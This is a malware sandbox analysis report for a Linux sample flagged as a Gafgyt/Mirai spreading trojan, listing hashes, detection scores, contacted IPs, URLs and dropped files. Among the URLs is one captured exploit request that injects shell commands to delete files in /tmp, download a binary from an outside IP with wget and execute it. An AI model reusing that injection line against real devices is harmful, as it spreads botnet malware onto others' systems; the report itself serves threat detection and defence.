01oHMcUgUM

Status: finished

Submission Time: 2022-01-14 23:48:18 +01:00

Malicious

Spreader

Trojan

Gafgyt Mirai

Comments

Details

Analysis ID:
553470
API (Web) ID:
920989
Analysis Started:

2022-01-15 00:13:48 +01:00
Analysis Finished:

2022-01-15 00:20:26 +01:00
MD5:
14c3173a21e8dd262999e2ab8c2833f4
SHA1:
efc2c18ac9a0f9dab71930037496cc676fa18bea
SHA256:
dec1840b49d9d7303369f1ce3efec379e86bd7095a4a2630b2c3df18ab1a12f4
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

Open Full Report

malicious

Score: 32/59

malicious

Score: 27/43

IPs

IP	Country	Detection
109.166.166.137	Romania
142.207.206.184	Canada
211.175.106.95	Korea Republic of
Click to see the 97 hidden entries
79.151.69.70	Spain
158.64.236.183	Luxembourg
80.250.181.202	Russian Federation
78.224.112.197	France
189.7.143.4	Brazil
1.32.222.215	Singapore
62.173.159.136	Russian Federation
159.41.147.230	United States
166.67.41.254	United States
156.38.69.221	Togo
138.153.211.93	United States
179.89.147.18	Brazil
67.59.185.234	United States
92.224.144.33	Germany
107.216.78.174	United States
144.153.205.195	United States
138.145.133.158	United States
123.220.43.229	Japan
91.10.214.233	Germany
69.60.247.77	Canada
77.140.167.126	France
204.85.48.52	United States
163.65.249.252	France
25.92.46.249	United Kingdom
161.169.114.7	United States
27.209.227.107	China
77.213.148.9	Denmark
140.51.225.181	United States
183.215.247.78	China
216.182.81.190	United States
70.66.117.174	Canada
39.152.182.206	China
174.76.47.162	United States
186.100.192.32	Argentina
89.183.195.88	Germany
76.162.184.197	United States
182.62.236.63	Malaysia
114.165.183.221	Japan
168.48.190.197	United States
100.48.158.49	United States
20.170.115.52	United States
73.194.93.58	United States
37.17.161.143	Hungary
207.163.26.164	United States
42.166.156.227	China
114.198.53.184	Australia
180.221.186.64	Japan
189.127.5.186	Brazil
1.217.99.233	Korea Republic of
121.87.53.6	Japan
103.70.12.25	unknown
106.6.195.143	China
113.216.47.10	Korea Republic of
152.167.122.118	Dominican Republic
185.72.169.17	Belgium
147.86.201.172	Switzerland
180.88.214.83	China
218.57.153.246	China
210.1.238.126	Japan
101.105.64.222	China
149.154.137.144	Russian Federation
180.166.5.121	China
161.4.230.66	Norway
189.96.247.130	Brazil
90.218.34.202	United Kingdom
140.177.25.158	United States
201.159.149.209	Brazil
104.86.5.165	United States
89.165.215.214	Romania
86.52.29.30	Denmark
200.102.167.34	Brazil
77.173.154.71	Netherlands
223.64.65.169	China
119.192.231.125	Korea Republic of
82.237.229.57	France
48.79.19.123	United States
208.27.38.166	United States
201.123.121.205	Mexico
19.174.160.178	United States
116.173.112.248	China
158.86.215.90	United States
109.114.40.25	Italy
57.147.18.91	Belgium
201.188.206.215	Chile
144.130.247.126	Australia
188.42.90.194	Luxembourg
220.241.36.28	Hong Kong
170.54.127.169	United States
125.36.135.148	China
60.89.247.251	Japan
76.73.122.174	United States
147.200.0.247	Australia
17.181.203.195	United States
46.7.53.244	Ireland
141.100.168.19	Germany
104.119.90.57	United States
24.211.135.100	United States

Domains

Name	IP	Detection
daisy.ubuntu.com	162.213.33.132

URLs

Name	Detection
https://www.rsyslog.com
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name	File Type	Hashes
/run/systemd/journal/streams/.#9:81743qgtbXw	ASCII text	#
/run/systemd/seats/.#seat04CQDsK	ASCII text	#
/run/systemd/journal/streams/.#9:831786sLlKu	ASCII text	#
Click to see the 97 hidden entries
/run/systemd/journal/streams/.#9:83087NTgMFw	ASCII text	#
/run/systemd/journal/streams/.#9:83035HPMT3w	ASCII text	#
/run/systemd/journal/streams/.#9:82945WjqdUw	ASCII text	#
/run/systemd/journal/streams/.#9:82794DXmhQj	ASCII text	#
/run/systemd/journal/streams/.#9:8279311ugqj	ASCII text	#
/run/systemd/journal/streams/.#9:827917N8ISi	ASCII text	#
/run/systemd/journal/streams/.#9:82782PURJkg	ASCII text	#
/run/systemd/journal/streams/.#9:82781swJnKg	ASCII text	#
/run/systemd/journal/streams/.#9:82299MKzupu	ASCII text	#
/run/systemd/journal/streams/.#9:82272ahUERw	ASCII text	#
/run/systemd/seats/.#seat0H9dzBL	ASCII text	#
/run/systemd/journal/streams/.#9:81742lJslft	ASCII text	#
/run/systemd/journal/streams/.#9:81741EnHQju	ASCII text	#
/run/systemd/journal/streams/.#9:817349fsQgv	ASCII text	#
/run/systemd/journal/streams/.#9:81733hWRT7s	ASCII text	#
/run/systemd/journal/streams/.#9:81732G2tIgt	ASCII text	#
/run/systemd/journal/streams/.#9:81359JlzJ2m	ASCII text	#
/run/systemd/journal/streams/.#9:81337vQY44j	ASCII text	#
/run/systemd/journal/streams/.#9:81206mUhmIm	ASCII text	#
/run/systemd/journal/streams/.#9:81205Kspzyj	ASCII text	#
/run/systemd/journal/streams/.#9:81165j2ca7j	ASCII text	#
/run/systemd/journal/streams/.#9:81164oDCsPl	ASCII text	#
/run/utmp	data	#
/var/cache/man/fr.ISO8859-1/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/index.db.OCAabv	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/index.db.ftENpx	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/index.db.mS9vnv	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/index.db.zlxt2v	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/index.db.lLtQIt	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/5241	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/run/systemd/journal/streams/.#9:811421HoHOk	ASCII text	#
/run/user/1000/pulse/pid	ASCII text	#
/run/systemd/users/.#127vfJmuM	ASCII text	#
/run/systemd/users/.#127uVfpoL	ASCII text	#
/run/systemd/users/.#127rKJxhO	ASCII text	#
/run/systemd/users/.#127kPNxmK	ASCII text	#
/run/systemd/users/.#127fQG1WL	ASCII text	#
/run/systemd/users/.#1272qAm2L	ASCII text	#
/run/systemd/seats/.#seat0iylKrM	ASCII text	#
/run/systemd/seats/.#seat0hYBHeC	ASCII text	#
/run/systemd/seats/.#seat0QFSyUi	ASCII text	#
/run/systemd/seats/.#seat0PEg28l	ASCII text	#
/run/systemd/journal/streams/.#9:76081clZZ9i	ASCII text	#
/run/systemd/journal/streams/.#9:78276zDHZrg	ASCII text	#
/run/systemd/journal/streams/.#9:78274LDLJsc	ASCII text	#
/run/systemd/journal/streams/.#9:77301zGjk2l	ASCII text	#
/run/systemd/journal/streams/.#9:77200qPMPln	ASCII text	#
/run/systemd/journal/streams/.#9:76673E90Zuj	ASCII text	#
/run/systemd/journal/streams/.#9:76672LfWnBk	ASCII text	#
/run/systemd/journal/streams/.#9:76642vnmg0j	ASCII text	#
/run/systemd/journal/streams/.#9:766405NJjXl	ASCII text	#
/run/systemd/journal/streams/.#9:76600QiThSk	ASCII text	#
/run/systemd/journal/streams/.#9:764780U9kwk	ASCII text	#
/run/systemd/journal/streams/.#9:76267GBzanj	ASCII text	#
/run/systemd/journal/streams/.#9:76098jnuUhk	ASCII text	#
/run/systemd/journal/streams/.#9:78293WpfxMc	ASCII text	#
/run/systemd/journal/streams/.#9:76076bQJlgl	ASCII text	#
/run/systemd/journal/streams/.#9:76053w7M9ej	ASCII text	#
/run/systemd/journal/streams/.#9:760345DYx4k	ASCII text	#
/run/systemd/journal/streams/.#9:75845smPTSk	ASCII text	#
/run/systemd/journal/streams/.#9:75484c3XBfj	ASCII text	#
/run/systemd/journal/streams/.#9:75481Lxxupj	ASCII text	#
/run/systemd/journal/streams/.#9:74684JG46el	ASCII text	#
/run/systemd/journal/streams/.#9:74683YKFMTi	ASCII text	#
/run/gdm3.pid	ASCII text	#
/proc/5534/oom_score_adj	very short file (no magic)	#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source	ASCII text	#
/run/systemd/journal/streams/.#9:7863030D3P6	ASCII text	#
/run/systemd/journal/streams/.#9:811419Lx59l	ASCII text	#
/run/systemd/journal/streams/.#9:81139GDlhEm	ASCII text	#
/run/systemd/journal/streams/.#9:811385LvOpm	ASCII text	#
/run/systemd/journal/streams/.#9:81135w8hm8l	ASCII text	#
/run/systemd/journal/streams/.#9:81120QtLPIl	ASCII text	#
/run/systemd/journal/streams/.#9:80506DvLsnn	ASCII text	#
/run/systemd/journal/streams/.#9:804992fV4Rn	ASCII text	#
/run/systemd/journal/streams/.#9:78734sHl0y6	ASCII text	#
/run/systemd/journal/streams/.#9:78733CI9qC7	ASCII text	#
/run/systemd/journal/streams/.#9:78725MnkSK5	ASCII text	#
/run/systemd/journal/streams/.#9:78723Liskd5	ASCII text	#
/run/systemd/journal/streams/.#9:78716wFt094	ASCII text	#
/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink	ASCII text	#
/run/systemd/journal/streams/.#9:78625WJpbu4	ASCII text	#
/run/systemd/journal/streams/.#9:78624OMxoR5	ASCII text	#
/run/systemd/journal/streams/.#9:78612NiaeS7	ASCII text	#
/run/systemd/journal/streams/.#9:78606qeBKb5	ASCII text	#
/run/systemd/journal/streams/.#9:78593XYklN6	ASCII text	#
/run/systemd/journal/streams/.#9:785543XKjm3	ASCII text	#
/run/systemd/journal/streams/.#9:78313lnmgOd	ASCII text	#
/run/systemd/journal/streams/.#9:783052wN6gf	ASCII text	#
/run/systemd/journal/streams/.#9:78304zOoGqe	ASCII text	#
/run/systemd/journal/streams/.#9:78303JMC4Wf	ASCII text	#
/run/systemd/journal/streams/.#9:78294tJWk2e	ASCII text	#

01oHMcUgUM

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

01oHMcUgUM Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

01oHMcUgUM